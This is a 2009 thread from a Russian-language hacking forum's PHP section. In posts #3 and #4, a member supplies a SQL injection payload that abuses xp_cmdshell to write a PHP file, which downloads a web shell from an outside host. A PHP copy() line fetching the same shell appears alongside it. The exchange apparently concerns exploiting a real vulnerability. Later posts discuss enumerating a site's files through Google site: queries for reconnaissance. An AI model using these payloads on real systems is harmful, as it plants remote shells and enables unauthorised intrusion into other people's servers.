HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.06.2009, 00:33
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

diznt, а можно поконкретнее? Ты юзаешь багу? Если да, то там, скорее всего, стоят мэджики, которые ты никак не обойдешь.
 
Ответить с цитированием

  #2  
Старый 13.06.2009, 00:34
DVD_RW
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203

Репутация: 628


По умолчанию

Кто поможет дописать парсер\граббер ? почти всё написано ... точнее код был , но сейчас с донором что то не в порядке
контакты в пм или пишите в icq 45девять\девять3333 , +5 дам (:
 
Ответить с цитированием

  #3  
Старый 13.06.2009, 00:40
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Код:
'; USE Master exec xp_cmdshell '<? file_put_contents("shell.php",file_get_contents("http://bugaga.zapto.org/shell.txt")); ?>' > C:\AppServ\www\shell1.php';--
Кста, скинь свою аську и уязвимость в пм, плз

http://forum.antichat.ru/private.php?do=newpm&userid=59362
 
Ответить с цитированием

  #4  
Старый 13.06.2009, 00:51
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Цитата:
Сообщение от mailbrush  
diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Код:
'; USE Master exec xp_cmdshell '<? file_put_contents("shell.php",file_get_contents("http://bugaga.zapto.org/shell.txt")); ?>' > C:\AppServ\www\shell1.php';--
Кста, скинь свою аську и уязвимость в пм, плз

http://forum.antichat.ru/private.php?do=newpm&userid=59362
Спасибо попробую... А то я совсем забыл cmd команды
 
Ответить с цитированием

  #5  
Старый 13.06.2009, 03:29
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

На сайте madnet.name/tools/madss/
есть такая штука что забиваешь туда сайт а он тебе высвечивает нектрые файлы которые доступны для просмотра (думаю поняли мою мысль)
Так вот как интересует откуда он это берет? (точнее откуда грабит)

Последний раз редактировалось diznt; 13.06.2009 в 03:31..
 
Ответить с цитированием

  #6  
Старый 13.06.2009, 13:39
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Цитата:
Сообщение от diznt  
На сайте madnet.name/tools/madss/
есть такая штука что забиваешь туда сайт а он тебе высвечивает нектрые файлы которые доступны для просмотра (думаю поняли мою мысль)
Так вот как интересует откуда он это берет? (точнее откуда грабит)
Цитата:
Данный сервис предназначен для определения структуры сайта. Часто приходится пользоватся различными сканнерами для определения структуры сайта, но мы забываем, что в 99% случаев до нас это сделал лучший сервис сети, великий и могучий GOOGLE, причем частенько он запоминает то, до чего смертному просто так не добраться. Моя система пытаетсы вытянуть максимум информации о сайте из гугла и построить на ее основе дерево сайта, утилита так же будет полезна web программистам для анализа индексации сайта гуглом.
Через гугл, но каким образом - это надо спросить у автора.
 
Ответить с цитированием

  #7  
Старый 13.06.2009, 16:37
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Цитата:
Сообщение от mailbrush  
Через гугл, но каким образом - это надо спросить у автора.
+цитата LEE_ROY

Как это?!
К примеру в гугле site:webxakep.net
И там будет выводиться странички форума и еще всякая фигня (webxakep.net/news/news-virus/printage,1,891-dos.linux.-iisuxor.html,webxakep.net:8080/engine/editor/scripts/form_file.htm)
Хм... Ладно хорошо к примеру там он определяет что это страничка форума и не выводит но все равно там много линков которые он не высветил

Последний раз редактировалось diznt; 13.06.2009 в 16:41..
 
Ответить с цитированием

  #8  
Старый 13.06.2009, 16:53
LEE_ROY
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме:
1917742

Репутация: 541


По умолчанию

Цитата:
Сообщение от diznt  
+цитата LEE_ROY

Как это?!
К примеру в гугле site:webxakep.net
И там будет выводиться странички форума и еще всякая фигня (webxakep.net/news/news-virus/printage,1,891-dos.linux.-iisuxor.html,webxakep.net:8080/engine/editor/scripts/form_file.htm)
Хм... Ладно хорошо к примеру там он определяет что это страничка форума и не выводит но все равно там много линков которые он не высветил
парсится первых к примеру 3 страницы, фильтруются на уники папки и файлы, после к запросу site:xakep.ru добавляется имя найденной папки - site:xakep.ru/user и тоже парсится 3 страницы. епты это же все можно понять просканив пару сайтов.
 
Ответить с цитированием

  #9  
Старый 13.06.2009, 03:38
-JC-
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312

Репутация: 50
По умолчанию

Из Google
 
Ответить с цитированием

  #10  
Старый 13.06.2009, 03:38
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Цитата:
Сообщение от -JC-  
Из Google
Подробнее
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.